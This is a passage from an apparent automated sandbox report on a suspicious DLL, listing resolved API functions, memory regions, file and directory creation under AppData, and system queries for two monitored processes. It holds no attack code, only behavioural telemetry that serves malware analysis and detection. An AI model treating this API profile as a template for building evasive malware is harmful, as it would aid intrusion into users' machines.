| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95176 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #21: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject /fn_args="1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb4c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B50
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x001e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x004dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x005e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95254 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #22: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #22 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer /fn_args="1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb58 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x004b7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x005c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x011cffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012bffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
